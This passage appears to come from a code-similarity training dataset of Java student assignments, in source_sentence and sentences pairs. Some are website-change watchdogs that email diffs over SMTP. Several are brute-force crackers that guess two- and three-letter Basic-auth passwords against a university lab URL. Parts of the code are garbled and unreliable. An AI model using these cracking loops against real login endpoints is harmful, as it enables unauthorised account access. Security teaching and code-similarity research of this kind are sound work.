\ StringBuffer buffer = new StringBuffer();\n\n while( (ptr = in.next())\
\ != -1 )\n {\n status++;\n \n buffer.append((char)ptr);\n\
\ mailFlag++;\n \n }\n return buffer.toString();\n\
\ }\n\n public void compareDiff(String emailAdd)\n {\n String cmds\
\ = \"diff test1.txt test2.txt\";\n PrintWriter printW2 = null;\n \
\ FileOutputStream fout2;\n \n File file = new File(\"diff.txt\");\n\
\ file.delete();\n String ;\n\n try\n {\n fout2\
\ = new FileOutputStream(\"diff.txt\",true);\n printW2 = new PrintWriter(fout2);\n\
\ }\n catch (IOException ioe)\n {\n System.out.println(\"\
IO Error : \" + ioe);\n }\n\n try\n {\n\n\n \n \
\ Process ps = Runtime.getRuntime().exec(cmds);\n PrintWriter out\
\ = new PrintWriter(new OutputStreamWriter(ps.getOutputStream()));\n\n \
\ printW2.println(loadStream(ps.getInputStream())+\"\\n\");\n printW2.print();\n\
\n\n if(mailFlag != 0)\n {\n FileReader fRead2;\n\
\ BufferedReader buf2;\n\n try\n {\n \
\ fRead2 = new FileReader(\"diff.txt\");\n buf2 = new\
\ BufferedReader(fRead2);\n String line2;\n int\
\ i=0;\n\n line = new String(\" some changes the web as followed:\
\ \\n\");\n \n Socket s = new Socket(\"wombat.cs.rmit.edu.\"\
, 25);\n out2 = new PrintWriter(s.getOutputStream());\n\n \
\ send(null);\n send(\"HELO cs.rmit.edu.\");\n \
\ send(\"MAIL FROM: @.rmit.edu.\");\n \n \
\ send(\"RCPT : @.rmit.edu.\");\n send(\"DATA\");\n \
\ \n\n while( (line2 = buf2.readLine()) != null)\n \
\ {\n \n line= new String(\"\"+line2+\"\\n\");\n \
\ \n \n\n }\n \
\ \n \n \n out2.print();\n \
\ send(\".\");\n s.print();\n }\n \
\ catch(FileNotFoundException e)\n {\n System.out.println(\"\
File not found\");\n }\n catch(IOException ioe)\n \
\ {\n System.out.println(\"IO Error \" + ioe);\n \
\ }\n }\n\n System.out.println(loadStream(ps.getInputStream()));\n\
\ \n System.err.print(loadStream(ps.getErrorStream()));\n \
\ }\n catch(IOException ioe)\n {\n ioe.printStackTrace();\n\
\ }\n }\n\n public void send(String s) throws IOException\n {\n\
\ \tresponse = new TextArea();\n \tif(s != null)\n \t{\n \
\ response.append(s + \"\\n\");\n out2.println(s);\n\t out2.flush();\n\
\t}\n }\n\n public int getStatus()\n {\n return status;\n }\n}"
sentences:
- "import java.io.*;\nimport java.util.StringTokenizer;\nimport java.net.smtp.SmtpClient;\n\
import java.util.Timer;\nimport java.util.TimerTask;\n\n\npublic class WatchDog\
\ {\npublic static void main(String[] args) {\ntry {\nProcess y = Runtime.getRuntime().exec(\"\
./init\");\n}\ncatch (Exception e) {System.err.println(e);}\n\n\nWatchDog poodle=new\
\ WatchDog();\n {\npoodle.startWatch();\n} while(1==1);\n}\n\npublic void startWatch()\
\ {\nString error_mes=new String();\nString mesg=new String();\nString url=\"\
wget -p http://www.cs.rmit.edu./students\";\n\ntry {\nProcess a = Runtime.getRuntime().exec(url);\n\
}\ncatch (Exception e) {System.err.println(e);}\n\ntry {\nProcess b = Runtime.getRuntime().exec(\"\
diff org/images/ www.cs.rmit.edu./images/\");\n BufferedReader stdInputimages\
\ = new BufferedReader(new InputStreamReader(b.getInputStream()));\n \
\ while ((error_mes = stdInputimages.readLine()) != null) {\n\n \
\ mesg=mesg.concat(error_mes);\n \n \n \
\ }\n}\ncatch (Exception e) {System.err.println(e);}\n\n\n\n\ntry {\nProcess\
\ c = Runtime.getRuntime().exec(\"diff org/students/ www.cs.rmit.edu./students/\"\
);\nBufferedReader stdInputindex = new BufferedReader(new InputStreamReader(c.getInputStream()));\n\
\ while ((error_mes = stdInputindex.readLine()) != null) {\n \
\ mesg=mesg.concat(error_mes);\n \n }\n}\n\
catch (Exception e) {System.err.println(e);}\n\n\nif (mesg.length()>0) { sendEmail(mesg);\
\ }\n\ntry { Thread.sleep(60*60*24*1000);\n } catch(Exception e) { }\n}\n\n\n\n\
\n\npublic void sendEmail(String message) {\n{\nString reciever = \"@cs.rmit.edu.\"\
;\nString sender = \"WATCHDOG@cs.rmit.edu.\";\n\n try {\n\n \
\ SmtpClient smtp = new SmtpClient();\n smtp.from(sender);\n\
\ smtp.to(reciever);\n PrintStream\
\ msg = smtp.startMessage();\n msg.println(message);\n\
\ smtp.closeServer();\n }\n\n \
\ catch (Exception e) {}\n\n }\n}\n}"
- "import java.net.*; \nimport java.io.*; \nimport java.util.regex.*;\nimport java.util.Date;\n\
import java.util.*;\nimport java.text.*; \n\n\n\n\npublic class WatchDog { \n\
\ public static BufferedReader in;\n \n\n public static int LIMITINMINUTES=60*24;\n\
\ public static int TIMELIMIT=LIMITINMINUTES*1000*60;\n public static void main(String[]\
\ args) throws Exception { \n \n String watchedPage = \"http://www.cs.rmit.edu./students/\"\
;\n String currentPage = \"\"; \n \n \n System.out.println(\" stop\
\ the program, press \\\"Alt + C\\\"\");\n \n boolean loggedout=false;\n\
\ while (!loggedout){\n \n currentPage=\"\";\n \n \n \
\ Date date = new Date();\n startTime=date.getTime();\n \n \
\ \n URL cs = new URL(watchedPage); \n HttpURLConnection connection;\n\
\ URLConnection csc = cs.openConnection(); \n try {\n\tBufferedReader\
\ in = new BufferedReader(new InputStreamReader(csc.getInputStream())); \n\tString\
\ inputLine; \n\t\n\twhile ((inputLine = in.readLine()) != null) {\n\t currentPage\
\ = currentPage+inputLine;\n\t}\n\t\n }\n catch (IOException s) { \
\ \n }\n finally {\n\twhile(in!=null)\n in.next();\n \
\ }\n \n String lastPage=readData();\n if (lastPage.trim().equals(currentPage.trim()))\
\ {\n\tSystem.out.println(\"Pages match, nothing email.\");\n }\n else\
\ {\n\t\n\t\n\tString checkCurrentPage = currentPage.trim();\n\tString checkLastPage\
\ = lastPage.trim();\n\tint iterations;\n\t\n\tboolean lastLongestString;\n\t\
if (checkCurrentPage.length()<checkLastPage.length()) {\n iterations\
\ = checkCurrentPage.length();\n\t lastLongestString = true;\n\t}\n\telse {\n\
\ iterations = checkLastPage.length();\n\t lastLongestString = false;\n\
\t \n\t}\n\tString additions = \"Here the additions the : \\n\";\n\tboolean\
\ add=false;\n\tString subtractions = \"Here the parts removed from the : \\\
n\";\n\tboolean sub=false;\n\tfor (int count=0; count<iterations; count++) {\n\
\ \n\t if (checkLastPage.length()>count && checkCurrentPage.length()>count){\n\
\t \n if (checkLastPage.charAt(count)!=(checkCurrentPage.charAt(count)))\
\ {\n\t \n\t \n\t if (count<20){\n\t\tadditions = \"Sorry changes\
\ together distinguish additions and subtractions . Here is where : \"+ checkCurrentPage.substring(count,\
\ checkCurrentPage.length());\n\t\tcount = iterations;\n\t }\n\t else\
\ {\n\t\t\n\t\t\n\t\tcheckCurrentPage= checkCurrentPage.substring(count, checkCurrentPage.length());\n\
\t\tcheckLastPage=checkLastPage.substring(count, checkLastPage.length());\n\t\t\
iterations=iterations-count;\n\t\tcount=0;\n\n\t\t\n\t\t\n\t\t\n\t\tString regexAdd=\"\
\";\n\t\tif (checkLastPage.length()<20){\n\t\t regexAdd=checkLastPage.substring(count,\
\ checkLastPage.length());\n\t\t}\n\t\telse {\t \n\t\t regexAdd=checkLastPage.substring(0,19);\n\
\t\t}\n\t\tString [] changes=checkCurrentPage.split(regexAdd, 2);\n\t\tint changeslength=changes.length;\n\
\t\t\n\t\tif (changeslength>1){\n\t\t \n\t\t add=true;\n\t\t additions = additions\
\ + changes[0];\t \n\t\t \n\t\t \n\t\t if (changeslength>1){\n\t\t checkCurrentPage=regexAdd+changes[1];\n\
\t\t }\n\t\t else {\n\t\t if (lastLongestString==true) \n\t \
\ count=iterations;\n\t\t } \n\t\t}\n\t\telse { \n\t \t\t \n\t\t \n\t\t \
\ \n\t\t String regexSub=\"\";\n\t\t if (checkCurrentPage.length()<20){\n\t\t\
\ regexSub=checkCurrentPage.substring(count, checkCurrentPage.length());\n\t\
\t }\n\t\t else {\t \n\t\t regexSub=checkCurrentPage.substring(0,19);\n\t\
\t }\n\t\t String [] changesSub=checkLastPage.split(regexSub, 2);\n\t\t int\
\ changeslengthSub=changesSub.length;\n\t\t \n\t\t if (changeslengthSub>1){\n\
\t\t \n\t\t sub=true;\n\t\t subtractions = subtractions + changesSub[0];\t\
\ \n\t\t \n\t\t \n\t\t if (changeslengthSub>1){\n\t\t checkLastPage=regexSub+changesSub[1];\n\
\t\t }\n\t\t else {\n\t\t if (lastLongestString==false) \n\t\t \
\ count=iterations;\n\t\t }\n\t\t \n\t\t \n\t\t }\n\t\t}\n\t }\n\
\n } \n\t } \n\t} \n\t\n\t\n\tString emailBody=\"Changes have been\
\ . \\n\"+additions+subtractions;\n\n\t\n\tsendEmail(emailBody);\n }\n\n\
\ \n writeData(currentPage);\n \n \n wait24(startTime);\n\
\ } \n } \n \n \n private static void wait24( int startTime) {\n boolean\
\ waiting=true;\n while(waiting){\n Date endDate = new Date();\n \
\ endTime=endDate.getTime();\n \n \n if (endTime>(TIMELIMIT+startTime)){\n\
\ \n waiting=false;\n }\t\n }\n } \n \n \n public\
\ static String readData() {\n String data;\n String lastPage=\"\";\n \
\ try {\n BufferedReader in = new BufferedReader(new FileReader(\"LastVisitedPage.html\"\
));\n while ((data = in.readLine())!=null) {\n lastPage= lastPage\
\ + data +\"\\n\";\n }\n \n }\n catch (FileNotFoundException e1)\
\ {\n System.exit(0);\n }\n catch (IOException e2) {\n System.out.println(\"\
IO Exception, exiting\");\n System.exit(0);\n }\t \n finally {\n\
\ try {\n\tif (null!=in) {\n in.next();\n\t}\n }\n catch (IOException\
\ e3) {}\n }\n return lastPage;\n }\n \n \n public static void writeData(String\
\ currentPage) {\n PrintWriter out;\n try {\n\tout = new PrintWriter (new\
\ BufferedWriter(new FileWriter(\"LastVisitedPage.html\")));\n\tout.println(currentPage);\n\
\t\n\t\n }\n catch (IllegalArgumentException e1) {\n\tSystem.out.println\
\ (\"Sorry, 't write file. None of changes in this session have been saved\"\
);\n\tSystem.exit(0);\n }\n catch (IOException e2) {\n\tSystem.out.println\
\ (\"Sorry, 't write file. None of changes in this session have been saved\"\
);\n\tSystem.exit(0);\n\t}\n finally {} \n } \n\n \n \n \n public static\
\ void sendEmail(String emailBody){\n \n Socket smtpSocket =null;\n DataOutputStream\
\ os = null;\n InputStreamReader is = null ;\n\n Date dDate = new Date();\n\
\ DateFormat dFormat = DateFormat.getDateInstance(DateFormat.FULL,Locale.US);\n\
\n try{ \n smtpSocket = new Socket(\".rmit.edu.\", 25);\n os = new\
\ DataOutputStream(smtpSocket.getOutputStream());\n is = new InputStreamReader(smtpSocket.getInputStream());\n\
\ BufferedReader = new BufferedReader(is);\n\n if(smtpSocket != null\
\ && os != null && is != null){ \n \n\ttry { \n\t os.writeBytes(\"HELO\
\ .rmit.edu.\\r\\n\");\n\t \n\t \n\t os.writeBytes(\"MAIL From: <@.rmit.edu.>\\\
r\\n\");\n\n\t \n\t os.writeBytes(\"RCPT : <@cs.rmit.edu.>\\r\\n\");\n\n\t \
\ \n\t \n\t os.writeBytes(\"DATA\\r\\n\");\n\n\t os.writeBytes(\"X-Mailer:\
\ Via Java\\r\\n\");\n\t os.writeBytes(\"DATE: \" + dFormat.format(dDate) + \"\
\\r\\n\");\n\t os.writeBytes(\"From: <@cs.rmit.edu.>\\r\\n\");\n\t os.writeBytes(\"\
: <@cs.rmit.edu.>\\r\\n\");\n\n\t os.writeBytes(\"Subject: updated\\r\\n\"\
);\n\t os.writeBytes(emailBody + \"\\r\\n\");\n\t os.writeBytes(\"\\r\\n.\\\
r\\n\");\n\t os.writeBytes(\"QUIT\\r\\n\");\n\n\t \n\t \n\t String responseline;\n\
\t while((responseline=is.readLine())!=null){ \n \n if(responseline.indexOf(\"\
Ok\") != -1) {\n break;\n }\n\t }\n\t}\n\tcatch(Exception\
\ e){ \n\t System.out.println(\"Cannot send email as error occurred.\"); \n\
\t}\n }\n else \n\tSystem.out.println(\"smtpSocket another variable\
\ is null!\");\n } \n catch(Exception e){ \n System.out.println(\"\
Host unknown\"); \n }\n } \n \n} \n\n\n"
- "\t\n\n\nimport java.io.*;\nimport java.net.*;\n\nimport java.util.*;\n\nimport\
\ java.misc.BASE64Encoder;\n\npublic class BruteForce {\n\n private String userId;\n\
\ private String password;\n\n private StringBuffer seed= new StringBuffer(\"\
aaa\");\n private int tries = 1;\t\n\n\n\t\n public BruteForce() {\n\n\n \
\ \n Authenticator.setDefault (new MyAuthenticator());\n }\n\n public String\
\ fetchURL (String urlString) {\n\tHttpURLConnection connection;\n\tStringBuffer\
\ sb = new StringBuffer();\n\tDate startTime, endTime;\n\tint responseCode = -1;\n\
\tboolean retry = true;\t\n\t\n URL url;\n startTime = new Date();\n \
\ \n System.out.println (\" time :\" + startTime);\n\n\twhile (retry == true)\n\
\t{\n\t\n\t try {\n\n\t\t\turl = new URL (urlString);\n\n\t\t\tconnection =\
\ (HttpURLConnection)url.openConnection();\n\n\t\t\tsetUserId(\"\");\n\t\t\tsetPassword(\"\
rhk8611\");\n\n\t\t\tSystem.out.println(\"Attempting get a response : \" +connection.getURL()\
\ );\n\t\t\tresponseCode = connection.getResponseCode();\n\t\t\tSystem.out.print(responseCode\
\ + \" \");\n\n\t\t\tif (responseCode == HttpURLConnection.HTTP_OK) \n\t\t\t{\n\
\t\t\t\tretry = false;\n\t\t\t\tSystem.out.println(\"**** ACCESS GRANTED *****\"\
);\n\t\t\t} else\n\t\t\t{\n\t\t\t\tretry = true;\n\t\t\t\tthrow new IOException(\n\
\t\t\t\t\t\"HTTP response : \" + String.valueOf(responseCode) + \n\t\t\t\t\t\"\
\\nResponse Message: \" +connection.getResponseMessage());\n\t\t\t\t\n\t\t\t}\n\
\n\t\t\tInputStream content = (InputStream)url.getContent();\n\t\t\tBufferedReader\
\ in = \n\t\t\tnew BufferedReader (new InputStreamReader (content));\n\t\t\t\
String line;\n\t\t\t\twhile ((line = in.readLine()) != null) {\n\t\t\t\t\tsb.append(line);\n\
\t\t\t\t}\n\t\t\t} catch (MalformedURLException e) {\n\t\t\t\t\n\t\t\t\tretry=false;\n\
\t\t\t\tSystem.out.println (\"Invalid URL\" + e.getMessage());\n\t\t\t} catch\
\ (IOException e) {\n\t\t\t\t\n\t\t\t\tretry=true;\n\t\t\t\tconnection = null;\n\
\t\t\t\tSystem.out.println (\"Error URL \\n\" + e.getMessage());\n\t\t\t}\n\t\
\t}\t\n\t\tendTime = new Date();\n\t\tSystem.out.print (\"Total Time taken :\"\
\ + (endTime.getTime() - startTime.getTime())/1000*60 + \" Minutes \");\n\t\t\
System.out.println ((endTime.getTime() - startTime.getTime())/1000 + \" Sec\"\
);\n\t\t\n\t\t\n\treturn sb.toString();\n }\n\n\n public static void main (String\
\ args[]) {\n\tBruteForce myGenerator = new BruteForce();\n\n\n\t\n\n\n\tSystem.out.println(\"\
Starting seed is : \"+ myGenerator.getSeed() );\n\tString pageFound = myGenerator.fetchURL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n\t\t\n\tSystem.out.println(\" ACCESSED\
\ ->\\n\" + pageFound);\n }\n\n class MyAuthenticator extends Authenticator\
\ {\n protected PasswordAuthentication getPasswordAuthentication()\n\t{\n\t\
\tString username = getUserId();\n\t\tString pass = getPassword();\t\n\t\tif (pass.equals(\"\
ZZZ\"))\n\t\t{\n\t\t\tSystem.out.println(\"\\nReached the end of combinations.\
\ EXITING.\\n\");\n\t\t\tSystem.exit(0);\n\t\t}\n\t\tif ((tries % 8) == 0 )\n\t\
\t{\n\t\t\tpass = \"\" + getNextPassword();\n\t\t}else \n\t\t{\n\t\t\tpass = \"\
\"+ getNextPasswordCase(\"\"+getSeed(), tries%8);\n\t\t}\n\t\ttries ++;\n\n\t\
\ System.out.println(tries + \" Authenticating with -> \" + pass);\n\n\t return\
\ new PasswordAuthentication (username, pass.toCharArray());\n\t \n }\n }\n\
\t\n\tpublic String getPassword()\n\t{\n\t\treturn this.password;\n\t}\n\n\tpublic\
\ void setPassword(String password)\n\t{\n\t\tthis.password = password;\n\t}\n\
\n\t\n\tpublic String getUserId()\n\t{\n\t\treturn this.userId;\n\t}\n\n\tpublic\
\ void setUserId(String userId)\n\t{\n\t\tthis.userId = userId;\n\t}\n\n\tpublic\
\ StringBuffer getNextPassword()\n\t{\n\t\tfinal int STRING_RADIX = 36;\n\t\t\n\
\t\tint changeDigit;\n\t\tint dig;\n\t\tchar cdig;\n\t\t\n\t\t\n\t\tchangeDigit\
\ = 2;\n\t\tif (getSeed().charAt(changeDigit) < 'z')\n\t\t{\n\t\t\tdig = Character.digit(getSeed().charAt(changeDigit),\
\ STRING_RADIX);\n\t\t\tdig = dig + 1;\n\t\t\tcdig = Character.forDigit(dig, STRING_RADIX);\n\
\t\t\tseed.setCharAt(changeDigit,cdig);\n\t\t\t\t\n\t\t} else\n\t\t{\n\t\t\t\n\
\t\t\tseed.setCharAt(2,'a');\n\t\t\t\n\t\t\t\n\t\t\tchangeDigit = 1;\n\t\t\tif\
\ (getSeed().charAt(changeDigit) < 'z')\n\t\t\t{\n\t\t\t\tdig = Character.digit(getSeed().charAt(changeDigit),\
\ STRING_RADIX);\n\t\t\t\tdig = dig + 1;\n\t\t\t\tcdig = Character.forDigit(dig,\
\ STRING_RADIX);\n\t\t\t\tseed.setCharAt(changeDigit,cdig);\n\t\t\t} else\n\t\t\
\t{\n\t\t\t\t\n\t\t\t\tseed.setCharAt(2,'a');\n\t\t\t\t\n\t\t\t\tseed.setCharAt(1,'a');\n\
\t\t\t\t\n\t\t\t\t\n\t\t\t\tchangeDigit = 0;\n\t\t\t\tif (getSeed().charAt(changeDigit)\
\ < 'z')\n\t\t\t\t{\n\t\t\t\t\tdig = Character.digit(getSeed().charAt(changeDigit),\
\ STRING_RADIX);\n\t\t\t\t\tdig = dig + 1;\n\t\t\t\t\tcdig = Character.forDigit(dig,\
\ STRING_RADIX);\n\t\t\t\t\tseed.setCharAt(changeDigit,cdig);\n\t\t\t\t}\n\t\t\
\t\t\n\t\t\t}\n\t\t\t\n\t\t}\n\n\t\treturn getSeed();\n\t\n\t}\n\n\tprivate StringBuffer\
\ getNextPasswordCase(String pwd, int inx)\n\t{\n\t\tStringBuffer casePwd = new\
\ StringBuffer(pwd);\n\t\tchar myChar;\n\t\tswitch (inx)\n\t\t{\n\t\t\tcase 1:\n\
\t\t\t\tmyChar = pwd.charAt(0);\n\t\t\t\tcasePwd.setCharAt(0, Character.toUpperCase(myChar));\n\
\t\t\t\tbreak;\n\t\t\tcase 2:\n\t\t\t\tmyChar = pwd.charAt(1);\n\t\t\t\tcasePwd.setCharAt(1,\
\ Character.toUpperCase(myChar));\n\t\t\t\tbreak;\n\t\t\tcase 3:\n\t\t\t\tmyChar\
\ = pwd.charAt(2);\n\t\t\t\tcasePwd.setCharAt(2, Character.toUpperCase(myChar));\n\
\t\t\t\tbreak;\n\t\t\tcase 4:\n\t\t\t\tmyChar = pwd.charAt(0);\n\t\t\t\tcasePwd.setCharAt(0,\
\ Character.toUpperCase(myChar));\n\t\t\t\tmyChar = pwd.charAt(1);\n\t\t\t\tcasePwd.setCharAt(1,\
\ Character.toUpperCase(myChar));\n\t\t\t\tbreak;\n\t\t\tcase 5:\n\t\t\t\tmyChar\
\ = pwd.charAt(0);\n\t\t\t\tcasePwd.setCharAt(0, Character.toUpperCase(myChar));\n\
\t\t\t\tmyChar = pwd.charAt(2);\n\t\t\t\tcasePwd.setCharAt(2, Character.toUpperCase(myChar));\n\
\t\t\t\tbreak;\n\t\t\tcase 6:\n\t\t\t\tmyChar = pwd.charAt(1);\n\t\t\t\tcasePwd.setCharAt(1,\
\ Character.toUpperCase(myChar));\n\t\t\t\tmyChar = pwd.charAt(2);\n\t\t\t\tcasePwd.setCharAt(2,\
\ Character.toUpperCase(myChar));\n\t\t\t\tbreak;\n\t\t\tcase 7:\n\t\t\t\tmyChar\
\ = pwd.charAt(0);\n\t\t\t\tcasePwd.setCharAt(0, Character.toUpperCase(myChar));\n\
\t\t\t\tmyChar = pwd.charAt(1);\n\t\t\t\tcasePwd.setCharAt(1, Character.toUpperCase(myChar));\n\
\t\t\t\tmyChar = pwd.charAt(2);\n\t\t\t\tcasePwd.setCharAt(2, Character.toUpperCase(myChar));\n\
\t\t\t\tbreak;\n\t\t}\n\t\treturn(casePwd);\n\t\t\n\t}\t\n\tpublic StringBuffer\
\ getSeed()\n\t{\n\t\treturn this.seed;\n\t}\n\n\tpublic void setSeed(StringBuffer\
\ seed)\n\t{\n\t\tthis.seed = seed;\n\t}\n\n\n\n} \n\n\n"
- source_sentence: "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public\
\ class BruteForce {\n\n URLConnection conn = null;\n private static boolean\
\ status = false;\n\n public static void main (String args[]){\n BruteForce\
\ a = new BruteForce();\n String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
,\n \t\t\t\t \"\",\n \t\t\t\t \"\"};\n int attempts = 0;\n exit:\n\
\ for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++)\
\ {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] ==\
\ ' ' && pwdArray[j] != ' ') continue;\n\t\t\t\t if (pwdArray[j] == ' ' && pwdArray[k]\
\ != ' ') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\
\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\
\t\t\t\t\t System.out.println(\"Correct password is: \" + inp[2]);\n\t\t\t\t\t\
\ System.out.println(\"Number of attempts = \" + attempts);\n\t\t\t\t\t break\
\ exit;\n\t\t\t \t }\n \t\t\t inp[2] = \"\";\n\t\t \t }\n\t \t }\n }\n\
\ }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader\
\ in = new BufferedReader(\n new InputStreamReader\n (connectURL(new\
\ URL(args[0]), args[1], args[2])));\n String line;\n while ((line\
\ = in.readLine()) != null) {\n System.out.println(line);\n \
\ status = true;\n }\n }\n catch (IOException e) {\n \n\
\ }\n }\n\n public InputStream connectURL (URL url, String uname,\
\ String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char pwdArray [] = {\n\t 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n\
\t 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n\t 'q', 'r', 's', 't',\
\ 'u', 'v', 'w', 'x',\n\t 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F',\n\t \
\ 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n\t 'O', 'P', 'Q', 'R',\
\ 'S', 'T', 'U', 'V',\n\t 'W', 'X', 'Y', 'Z', ' '\n };\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
sentences:
- "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\nimport java.io.*;\n\
import java.net.*;\n\n\n\npublic class BruteForce\n{\n private URL url;\n \
\ private HttpURLConnection connection ;\n private int stopTime = 0;\n private\
\ int startTime = 0;\n private int count = 0;\n\n public BruteForce()\n\
\ {\n System.out.println(\"Process is running...\");\n startTime =\
\ System.currentTimeMillis();\n threeLetters();\n twoLetters();\n \
\ }\n\n public static void main (String args[])\n {\n BruteForce bf =\
\ new BruteForce();\n }\n \n public void threeLetters()\n {\n String\
\ s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n\
\ {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for\
\ (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0]\
\ + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1))\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] +\
\ i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1]\
\ + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n }\n }\n }\n }\n \n public\
\ void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n\
\ for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1\
\ < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0))\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1]\
\ + i1)).toUpperCase();\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n \
\ (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase()\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n }\n }\n }\n\n \n public void decision(String\
\ s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n\
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
